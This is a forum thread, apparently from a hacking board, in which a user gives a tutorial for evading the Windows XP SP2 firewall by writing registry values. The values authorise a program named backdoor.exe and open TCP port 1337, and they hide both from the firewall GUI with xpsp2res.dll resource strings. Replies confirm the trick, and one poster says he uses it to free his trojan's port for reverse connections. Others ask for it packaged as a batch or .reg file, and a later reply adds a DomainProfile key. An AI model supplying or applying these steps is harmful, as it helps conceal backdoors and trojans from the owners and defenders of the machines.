[da_cash]

We can bypass windows firewall using registry.

Just open regedit.exe and go to

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List

As you can see the sharedaccess service aka windows firewall contains the names of applications allowed for outbound connections.

Tto give access to the desired application we need to add similiar key:

C:\\WINDOWS\\system32\\backdoor.exe"="C:\\WINDOWS\\system32\\backdoor.exe:*:Enabled

But then out "backdoor" will be listed in Firewall GUI allowed applications.

Anyway we may hide it by making this

C:\\WINDOWS\\system32\\backdoor.exe"="C:\\WINDOWS\\system32\\backdoor.exe:*:Enabled:@xpsp2res.dll,-22019"

We can also open globally any port we want

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List

by adding similiar value inside this registry key

"1337:TCP"="1337:TCP:*:Enabled:Name"

Where "Name" is the name we want to be showed in the GUI

To hide port from listing in the GUI mode we may make something like that

1337:TCP:*:Enabled:@xpsp2res.dll,-22003

an then the port will be hidden from listing (XP SP2)..



It works on XP SP2 i didn't tested it on any other os.

This method is used by some malware /spyware manufacturers and together with rootkit it may be reallly dangerous.

[Jumpi]

i use to free the port my trojan uses. it works with a single commandline, i'm gonna lok for it when i'm at home again.

a reverse-connection was never stopped by the sp2-firewall, this seems to be the best method at the moment cause you don't see anything strange in the firewallsettings

[o0oKARo0o]

It does work, excellent tip ;)

[knull]

good, good, good...

BN says:
This was the 3rd useless post in 21 posts. Disabled account 28 days. Any other takers?

[o0oKARo0o]

Actually it works but it still in the list but under remote assistance, any ideas ?
And using a rootkit, aftewards, the connection isn�t allowed by firewall anymore dut to the inexistence of the program...

[ninar12]

one question why dont u use "netsh"

netsh firewall ...


much confortable

but i dont know if its a native commant under nt
xp im sure it works

[Lie8]

very very good tut .... thnx

BN says:
This person had 3 useless posts out of 10. Another 28-day winner!

[dw-chow]

nice, but one question still remains... is it possible to get through it by remote means?

[bah]

Actually I have another question I checked on win3k for the reg keys
and couldnt find any even though windows firewall was up and applications
had been added to exempt list from the gui, so were are the win3k
reg keys and does the :@xpsp2res.dll,-22003 work under w3k ?

[AdmiralB]

maybe some1 can compile into a nice bat file

[smith_john]

nice topic


From Packet: Sounds like a thx post to me! Warning points added. And from a chronic thanks poster so muchos suspend too.

[Jackson]

Hello Really idea!! However, somebody can pack in regfile then one only must explain! And how is that with other Firewalls this functions there just??

[bubilla]

To open the ports you also have to add the following key:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List\1337:TCP="1337:TCP:*:Enabled:Name"